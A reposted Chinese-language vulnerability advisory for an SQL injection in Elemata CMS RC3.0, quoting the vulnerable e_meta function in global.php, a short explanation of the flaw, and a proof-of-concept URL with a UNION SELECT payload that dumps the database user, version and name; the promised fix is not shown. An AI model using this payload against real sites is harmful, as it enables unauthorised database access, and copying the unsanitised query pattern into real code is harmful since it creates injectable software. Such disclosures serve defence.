鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

Elemata CMS RC3.0 (global.php, id param)SQL注入及修复

来源:互联网 作者:佚名 时间:2015-10-19 08:41
# 标题 : Elemata CMS RC3.0 SQL Injection# 漏洞作者 : CWH Underground# 网站 : www.2600.in.th# 开发者网址 : http://www.elemata.com/# 下载地址 : http://jaist.dl.sourceforge.net/project/elematacms/Elemata%203.x/ElemataRC3.0.zip# 影响版本 : RC
# 标题   : Elemata CMS RC3.0 SQL Injection
# 漏洞作者 : CWH Underground
# 网站      : www.2600.in.th
# 开发者网址 : http://www.elemata.com/
# 下载地址 : http://jaist.dl.sourceforge.net/project/elematacms/Elemata%203.x/ElemataRC3.0.zip
#  影响版本        : RC 3.0
# 已测试平台      : Window and Linux
 
    
##############################
缺陷: SQL Injection
##############################
    
/functions/global.php (LINE: 24-30)
    
-----------------------------------------------------------------------------  
function e_meta($id)
{
   include ("Connections/default.php");
   mysql_select_db($database_default, $default);
   $query_meta = "SELECT * FROM posts WHERE id = '$id'";
   $meta = mysql_query($query_meta, $default) or die(mysql_error());
   $row_meta = mysql_fetch_assoc($meta);
-----------------------------------------------------------------------------      
    
#####################################################
sql注射概述
#####################################################
    
An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
depending on the query, DBMS and configuration.
   
POC:
   
http://www.2cto.com /elemata/?id=-1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat%28user%28%29,0x3a3a,version%28%29,0x3a3a,database%28%29%29,NULL,NULL,NULL,NULL--+
 

 

网友评论
<